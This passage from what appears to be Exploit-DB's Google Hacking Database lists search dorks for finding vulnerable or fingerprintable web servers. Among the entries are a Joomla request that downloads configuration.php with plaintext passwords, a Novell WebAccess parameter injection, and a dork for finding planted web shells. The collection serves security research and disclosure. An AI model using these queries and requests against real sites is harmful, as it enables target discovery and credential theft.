<textualDescription>inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com
sites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txt
Can then check the CHANGELOG.txt file manually for version (not 7.32?).
</textualDescription>
<query>inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com</querystring>
<edb></edb>
<date>2014-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1255</id>
<link>https://www.exploit-db.com/ghdb/1255</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:rpSys.html</shortDescription>
<textualDescription>Web configuration pages for various types of systems. Many of these systems are not password protected.</textualDescription>
<query>inurl:rpSys.html</query>
<querystring>https://www.google.com/search?q=inurl%3ArpSys.html&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2006-01-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>120</id>
<link>https://www.exploit-db.com/ghdb/120</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:search.php vbulletin</shortDescription>
<textualDescription>Version 3.0.0 candidate 4 and earlier of Vbulletin may have a cross-site scripting vulnerability. See http://www.securityfocus.com/bid/9656 for more info.</textualDescription>
<query>inurl:search.php vbulletin</query>
<querystring>https://www.google.com/search?q=inurl%3Asearch.php+vbulletin</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>809</id>
<link>https://www.exploit-db.com/ghdb/809</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:servlet/webacc</shortDescription>
<textualDescription>I was playing around on the net when I found a small problem with Novell's WebAcces. With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=&quot;&gt; this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context</textualDescription>
<query>inurl:servlet/webacc</query>
<querystring>https://www.google.com/search?num=100&amp;c2coff=1&amp;q=inurl%3Aservlet%2Fwebacc</querystring>
<edb></edb>
<date>2005-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3743</id>
<link>https://www.exploit-db.com/ghdb/3743</link>
<category>Vulnerable Servers</category>
<shortDescription>inurl:view.php?board1_sn=</shortDescription>
<textualDescription>locates a webapp vulnerable to SQL injection</textualDescription>
<query>inurl:view.php?board1_sn=</query>
<querystring>https://www.google.com/search?q=inurl:view.php?board1_sn=</querystring>
<edb></edb>
<date>2011-09-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>4687</id>
<link>https://www.exploit-db.com/ghdb/4687</link>
<category>Vulnerable Servers</category>
<shortDescription>Joomla! com_joomanager - Arbitrary File Download</shortDescription>
<textualDescription>1. Google inurl:&quot;index.php?option=com_joomanager&quot; = 3540 results
2. [URL]+/index.php?option=com_joomanager&amp;controller=details&amp;task=download&amp;path=configuration.php gives a file which has password in PLAINTEXT!
Source: https://twitter.com/ankit_anubhav/status/970673767750959104</textualDescription>
<query>inurl:&quot;index.php?option=com_joomanager&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;index.php?option=com_joomanager&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/44252</edb>
<date>2018-03-05</date>
<author>Ankit Anubhav</author>
</entry>
<entry>
<id>3691</id>
<link>https://www.exploit-db.com/ghdb/3691</link>
<category>Vulnerable Servers</category>
<shortDescription>MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON</shortDescription>
<textualDescription>Author :- eXeSoul
You will get lots of web shells even some private shells.</textualDescription>
<query>MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON</query>
<querystring>https://www.google.com/search?q=MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON</querystring>
<edb></edb>
<date>2011-02-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>642</id>
<link>https://www.exploit-db.com/ghdb/642</link>
<category>Vulnerable Servers</category>
<shortDescription>natterchat inurl:home.asp -site:natterchat.co.uk</shortDescription>
<textualDescription>NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access...</textualDescription>
<query>natterchat inurl:home.asp -site:natterchat.co.uk</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=natterchat+inurl%3Ahome.asp+-site%3Anatterchat.co.uk+</querystring>
<edb></edb>
<date>2004-11-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6235</id>
<link>https://www.exploit-db.com/ghdb/6235</link>
<category>Vulnerable Servers</category>
<shortDescription>site: target.com ext:action | ext:struts | ext:do</shortDescription>
<textualDescription>*Dork:* site: target.com ext:action | ext:struts | ext:do
*Description:* This google dork will list up all the sites which use struts
framework in there site.
*Author:* Sushant Shashikant Kamble
https://www.linkedin.com/in/iamsushantkamble
</textualDescription>
<query>site: target.com ext:action | ext:struts | ext:do</query>
<querystring>https://www.google.com/search?q=site: target.com ext:action | ext:struts | ext:do</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Sushant Kamble</author>
</entry>
<entry>
<id>5561</id>
<link>https://www.exploit-db.com/ghdb/5561</link>
<category>Vulnerable Servers</category>
<shortDescription>vBulletin 5.0 &lt; 5.5.4 - Unauthenticated Remote Code Execution</shortDescription>
<textualDescription>vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
Google Dorks:
- site:*.vbulletin.net
- &quot;Powered by vBulletin Version 5.5.4&quot;</textualDescription>
<query>&quot;Powered by vBulletin Version 5.5.4&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by vBulletin Version 5.5.4&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/47447</edb>
<date>2019-10-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>1115</id>
<link>https://www.exploit-db.com/ghdb/1115</link>
<category>Vulnerable Servers</category>
<shortDescription>XOOPS Custom Installation</shortDescription>
<textualDescription>XOOPS custom installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations via pre-filled form data.</textualDescription>
<query>XOOPS Custom Installation</query>
<querystring>https://www.google.com/search?q=intitle:%22XOOPS+Custom+Installation%22&amp;c2coff=1&amp;start=20&amp;sa=N</querystring>
<edb></edb>
<date>2005-09-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>658</id>
<link>https://www.exploit-db.com/ghdb/658</link>
<category>Web Server Detection</category>
<shortDescription>&quot;About Mac OS Personal Web Sharing&quot;</shortDescription>
<textualDescription>Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement.</textualDescription>
<query>&quot;About Mac OS Personal Web Sharing&quot;</query>
<querystring>https://www.google.com/search?q=%22About+Mac+OS+Personal+Web+Sharing%22&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>347</id>
<link>https://www.exploit-db.com/ghdb/347</link>
<category>Web Server Detection</category>
<shortDescription>&quot;AnWeb/1.42h&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;AnWeb/1.42h&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?q=%22AnWeb%2f%31%2e%34%32h%22+intitle%3aindex%2eof</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4664</id>
<link>https://www.exploit-db.com/ghdb/4664</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Application Blocked!&quot; &quot;Google bot&quot;</shortDescription>
<textualDescription>Pages with black list or behind Fortigate firewall.
Regards.
Rootkit Pentester.
</textualDescription>
<query>&quot;Application Blocked!&quot; &quot;Google bot&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Application Blocked!&quot; &quot;Google bot&quot;</querystring>
<edb></edb>
<date>2018-02-02</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>348</id>
<link>https://www.exploit-db.com/ghdb/348</link>
<category>Web Server Detection</category>
<shortDescription>&quot;CERN httpd 3.0B (VAX VMS)&quot;</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;CERN httpd 3.0B (VAX VMS)&quot;</query>
<querystring>https://www.google.com/search?q=%22CERN+httpd+3.0B+(VAX+VMS)%22&amp;oe=UTF-8</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6945</id>
<link>https://www.exploit-db.com/ghdb/6945</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Cisco Systems, Inc. All Rights Reserved.&quot; -cisco.com filetype:jsp</shortDescription>
<textualDescription># Dork: &quot;Cisco Systems, Inc. All Rights Reserved.&quot; -cisco.com filetype:jsp</textualDescription>
<query>&quot;Cisco Systems, Inc. All Rights Reserved.&quot; -cisco.com filetype:jsp</query>
<querystring>https://www.google.com/search?q=&quot;Cisco Systems, Inc. All Rights Reserved.&quot; -cisco.com filetype:jsp</querystring>
<edb></edb>
<date>2021-05-18</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>361</id>
<link>https://www.exploit-db.com/ghdb/361</link>
<category>Web Server Detection</category>
<shortDescription>&quot;httpd+ssl/kttd&quot; * server at intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;httpd+ssl/kttd&quot; * server at intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22httpd%2Bssl%2Fkttd%22+*+server+at+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5077</id>
<link>https://www.exploit-db.com/ghdb/5077</link>
<category>Web Server Detection</category>
<shortDescription>&quot;I have been invoked by servletToJSP&quot;</shortDescription>
<textualDescription># Exploit Title: i have been invoked by servletToJSP
# Google Dork: i have been invoked by servletToJSP
# Date: January 12, 2019
# Exploit Author: g.go
# Vender Homepage: g.goog.gogooggo@gmail.com
# Software Link: tomcat.apache.org
# Version: 7-9
# Description: find many improperly set up tomacat servlets
#### Google Dork
i have been invoked by servletToJSP
</textualDescription>
<query>&quot;I have been invoked by servletToJSP&quot;</query>
<querystring>https://www.google.com/search?q=&quot;I have been invoked by servletToJSP&quot;</querystring>
<edb></edb>
<date>2019-01-14</date>
<author>g.go</author>
</entry>
<entry>
<id>6245</id>
<link>https://www.exploit-db.com/ghdb/6245</link>
<category>Web Server Detection</category>
<shortDescription>&quot;index of /private&quot; -site:net -site:com -site:org</shortDescription>
<textualDescription># Dork: &quot;index of /private&quot; -site:net -site:com -site:org
This dork is very very important for indexed information.
Thank you
Ashish More
</textualDescription>
<query>&quot;index of /private&quot; -site:net -site:com -site:org</query>
<querystring>https://www.google.com/search?q=&quot;index of /private&quot; -site:net -site:com -site:org</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Ashish More</author>
</entry>
<entry>
<id>349</id>
<link>https://www.exploit-db.com/ghdb/349</link>
<category>Web Server Detection</category>
<shortDescription>&quot;JRun Web Server&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;JRun Web Server&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22JRun+Web+Server%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>350</id>
<link>https://www.exploit-db.com/ghdb/350</link>
<category>Web Server Detection</category>
<shortDescription>&quot;MaXX/3.1&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;MaXX/3.1&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22MaXX%2F3.1%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>351</id>
<link>https://www.exploit-db.com/ghdb/351</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Microsoft-IIS/* server at&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Microsoft-IIS/* server at&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Microsoft-IIS%2F*+server+at%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>352</id>
<link>https://www.exploit-db.com/ghdb/352</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Microsoft-IIS/4.0&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Microsoft-IIS/4.0&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Microsoft-IIS%2F4.0%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>353</id>
<link>https://www.exploit-db.com/ghdb/353</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Microsoft-IIS/5.0 server at&quot;</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Microsoft-IIS/5.0 server at&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Microsoft-IIS%2F5.0+server+at%22</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>354</id>
<link>https://www.exploit-db.com/ghdb/354</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Microsoft-IIS/6.0&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Microsoft-IIS/6.0&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Microsoft-IIS%2F6.0%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>834</id>
<link>https://www.exploit-db.com/ghdb/834</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Netware * Home&quot; inurl:nav.html</shortDescription>
<textualDescription>Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!</textualDescription>
<query>&quot;Netware * Home&quot; inurl:nav.html</query>
<querystring>https://www.google.com/search?q=%22Netware+*+Home%22+inurl%3Anav.html</querystring>
<edb></edb>
<date>2005-01-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>382</id>
<link>https://www.exploit-db.com/ghdb/382</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Novell, Inc&quot; WEBACCESS Username Password &quot;Version *.*&quot; Copyright -inurl:help -guides|guide</shortDescription>
<textualDescription>This may be used to find Novell Grouwise Webaccess servers.</textualDescription>
<query>&quot;Novell, Inc&quot; WEBACCESS Username Password &quot;Version *.*&quot; Copyright -inurl:help -guides|guide</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Novell%2C+Inc%22+WEBACCESS+Username+Password+%22Version+*.*%22+Copyright++-inurl%3Ahelp+-guides%7Cguide</querystring>
<edb></edb>
<date>2004-07-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>7320</id>
<link>https://www.exploit-db.com/ghdb/7320</link>
<category>Web Server Detection</category>
<shortDescription>&quot;NTRIP Caster Table Contents&quot; &quot;This is a SNIP NTRIP Caster&quot;</shortDescription>
<textualDescription># Google Dork: &quot;NTRIP Caster Table Contents&quot; &quot;This is a SNIP NTRIP Caster&quot;
# Web Server Detection
# Date: 15/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>&quot;NTRIP Caster Table Contents&quot; &quot;This is a SNIP NTRIP Caster&quot;</query>
<querystring>https://www.google.com/search?q=&quot;NTRIP Caster Table Contents&quot; &quot;This is a SNIP NTRIP Caster&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>355</id>
<link>https://www.exploit-db.com/ghdb/355</link>
<category>Web Server Detection</category>
<shortDescription>&quot;OmniHTTPd/2.10&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;OmniHTTPd/2.10&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22OmniHTTPd%2F2.10%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>356</id>
<link>https://www.exploit-db.com/ghdb/356</link>
<category>Web Server Detection</category>
<shortDescription>&quot;OpenSA/1.0.4&quot; intitle:index.of</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;OpenSA/1.0.4&quot; intitle:index.of</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22OpenSA%2F1.0.4%22+intitle%3Aindex.of</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4363</id>
<link>https://www.exploit-db.com/ghdb/4363</link>
<category>Web Server Detection</category>
<shortDescription>&quot;PHP Credits&quot; &quot;Configuration&quot; &quot;PHP Core&quot; ext:php inurl:info</shortDescription>
<textualDescription>Dork: &quot;PHP Credits&quot; &quot;Configuration&quot; &quot;PHP Core&quot; ext:php inurl:info
Another way to look Phpinfo()
Google Dork by INILERM</textualDescription>
<query>&quot;PHP Credits&quot; &quot;Configuration&quot; &quot;PHP Core&quot; ext:php inurl:info</query>
<querystring>https://www.google.com/search?q=&quot;PHP Credits&quot; &quot;Configuration&quot; &quot;PHP Core&quot; ext:php inurl:info</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>6594</id>
<link>https://www.exploit-db.com/ghdb/6594</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Powered by 123LogAnalyzer&quot;</shortDescription>
<textualDescription>Find Private and/or files containing sensitive or restricted information
via LogAnalyzer stored on the network.
~ Strontium
</textualDescription>
<query>&quot;Powered by 123LogAnalyzer&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by 123LogAnalyzer&quot;</querystring>
<edb></edb>
<date>2020-10-06</date>
<author>Strontium</author>
</entry>
<entry>
<id>5156</id>
<link>https://www.exploit-db.com/ghdb/5156</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Powered by BOINC&quot;</shortDescription>
<textualDescription>Find websites powered by BOINC.
~ CrimsonTorso
</textualDescription>
<query>&quot;Powered by BOINC&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by BOINC&quot;</querystring>
<edb></edb>
<date>2019-03-18</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>5812</id>
<link>https://www.exploit-db.com/ghdb/5812</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Powered by phpBB&quot; inurl:&quot;index.php?s&quot; OR inurl:&quot;index.php?style&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by phpBB&quot; inurl:&quot;index.php?s&quot; OR
inurl:&quot;index.php?style&quot;
# By using this dork, vulnerable web sites running phpBB can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by phpBB&quot; inurl:&quot;index.php?s&quot; OR inurl:&quot;index.php?style&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by phpBB&quot; inurl:&quot;index.php?s&quot; OR inurl:&quot;index.php?style&quot;</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5043</id>
<link>https://www.exploit-db.com/ghdb/5043</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Powered by vShare&quot;</shortDescription>
<textualDescription>Find websites that are used to upload files and videos.
~ CrimsonTorso
</textualDescription>
<query>&quot;Powered by vShare&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by vShare&quot;</querystring>
<edb></edb>
<date>2018-12-04</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>389</id>
<link>https://www.exploit-db.com/ghdb/389</link>
<category>Web Server Detection</category>
<shortDescription>&quot;powered by&quot; &quot;shoutstats&quot; hourly daily</shortDescription>
<textualDescription>shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers.</textualDescription>
<query>&quot;powered by&quot; &quot;shoutstats&quot; hourly daily</query>
<querystring>https://www.google.com/search?q=%22powered+by%22+%22shoutstats%22+hourly+daily&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5118</id>
<link>https://www.exploit-db.com/ghdb/5118</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Proudly created with Wix.com&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ Find Websites made with WIX ++
&quot;Proudly created with Wix.com&quot;
- 13.500.000 results at the time of writing</textualDescription>
<query>&quot;Proudly created with Wix.com&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Proudly created with Wix.com&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4808</id>
<link>https://www.exploit-db.com/ghdb/4808</link>
<category>Web Server Detection</category>
<shortDescription>&quot;RDServer Product information&quot; | inurl:&quot;/rdagent.jsp&quot;</shortDescription>
<textualDescription>&quot;RDServer Product information&quot; | inurl:&quot;/rdagent.jsp&quot;
This dork show RDServer Product information
ManhNho
</textualDescription>
<query>&quot;RDServer Product information&quot; | inurl:&quot;/rdagent.jsp&quot;</query>
<querystring>https://www.google.com/search?q=&quot;RDServer Product information&quot; | inurl:&quot;/rdagent.jsp&quot;</querystring>
<edb></edb>
<date>2018-05-07</date>
<author>ManhNho</author>
</entry>
<entry>
<id>357</id>
<link>https://www.exploit-db.com/ghdb/357</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Red Hat Secure/2.0&quot;</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Red Hat Secure/2.0&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Red+Hat+Secure%2F2.0%22</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>358</id>
<link>https://www.exploit-db.com/ghdb/358</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Red Hat Secure/3.0 server at&quot;</shortDescription>
<textualDescription>The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision.</textualDescription>
<query>&quot;Red Hat Secure/3.0 server at&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22Red+Hat+Secure%2F3.0+server+at%22</querystring>
<edb></edb>
<date>2004-07-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>107</id>
<link>https://www.exploit-db.com/ghdb/107</link>
<category>Web Server Detection</category>
<shortDescription>&quot;seeing this instead&quot; intitle:&quot;test page for apache&quot;</shortDescription>
<textualDescription>This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained.</textualDescription>
<query>&quot;seeing this instead&quot; intitle:&quot;test page for apache&quot;</query>
<querystring>https://www.google.com/search?q=%22seeing+this+instead%22+intitle%3A%22test+page+for+apache%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>655</id>
<link>https://www.exploit-db.com/ghdb/655</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Switch to table format&quot; inurl:table|plain</shortDescription>
<textualDescription>This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com</textualDescription>
<query>&quot;Switch to table format&quot; inurl:table|plain</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22Switch+to+table+format%22+inurl%3Atable%7Cplain</querystring>
<edb></edb>
<date>2004-11-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5004</id>
<link>https://www.exploit-db.com/ghdb/5004</link>
<category>Web Server Detection</category>
<shortDescription>&quot;This server is operated by OpenX.&quot;</shortDescription>
<textualDescription>Find websites using the OpenX web server software.
~ CrimsonTorso
</textualDescription>
<query>&quot;This server is operated by OpenX.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;This server is operated by OpenX.&quot;</querystring>
<edb></edb>
<date>2018-10-31</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>4705</id>
<link>https://www.exploit-db.com/ghdb/4705</link>
<category>Web Server Detection</category>
<shortDescription>&quot;var miner = new CoinHive&quot; intext:document.domain</shortDescription>
<textualDescription>*Google *dork* description: *sites running the CoinHive crypto miner
*Google Search:* &quot;var miner = new CoinHive&quot; intext:document.domain
*Submitted by:* Alfie
*Website: (*https://the-infosec.com*)*
</textualDescription>
<query>&quot;var miner = new CoinHive&quot; intext:document.domain</query>
<querystring>https://www.google.com/search?q=&quot;var miner = new CoinHive&quot; intext:document.domain</querystring>
<edb></edb>
<date>2018-03-21</date>
<author>Alfie</author>
</entry>
<entry>
<id>7270</id>
<link>https://www.exploit-db.com/ghdb/7270</link>
<category>Web Server Detection</category>
<shortDescription>&quot;Wowza Streaming Engine 4 Developer Edition&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Wowza Streaming Engine 4 Developer Edition&quot;
# Web Server Detection
# Date: 18/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>&quot;Wowza Streaming Engine 4 Developer Edition&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Wowza Streaming Engine 4 Developer Edition&quot;</querystring>
<edb></edb>
<date>2021-09-21</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>986</id>
<link>https://www.exploit-db.com/ghdb/986</link>
<category>Web Server Detection</category>
<shortDescription>(intitle:&quot;502 Proxy Error&quot;)|(intitle:&quot;503 Proxy Error&quot;) &quot;The proxy server could not handle the request&quot; -topic -mail -4suite -list -site:geocrawler.co</shortDescription>
<textualDescription>A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance.</textualDescription>
<query>(intitle:&quot;502 Proxy Error&quot;)|(intitle:&quot;503 Proxy Error&quot;) &quot;The proxy server could not handle the request&quot; -topic -mail -4suite -list -site:geocrawler.co</query>
<querystring>https://www.google.com/search?q=%28intitle%3A%22502+Proxy+Error%22%29%7C%28intitle%3A%22503+Proxy+Error%22%29+%22The+proxy+server+could+not+handle+the+request%22+-topic+-mail+-4suite+-list+-site%3Ageocrawler.com+-site%3Aelitesecurity.org</querystring>
<edb></edb>
<date>2005-05-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>882</id>
<link>https://www.exploit-db.com/ghdb/882</link>
<category>Web Server Detection</category>
<shortDescription>(inurl:81-cobalt | inurl:cgi-bin/.cobalt)</shortDescription>
<textualDescription>Cobal RaQ internal pages</textualDescription>
<query>(inurl:81-cobalt | inurl:cgi-bin/.cobalt)</query>
<querystring>https://www.google.com/search?q=(inurl:81-cobalt+%7C+inurl:cgi-bin/.cobalt)</querystring>
<edb></edb>
<date>2005-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>5714</id>
<link>https://www.exploit-db.com/ghdb/5714</link>
<category>Web Server Detection</category>
<shortDescription>-pub -pool intitle:&quot;index of&quot; &quot;Served by&quot; &quot;Web Server&quot;</shortDescription>
<textualDescription>LiteSpeed Webservers
Bruno Schmid
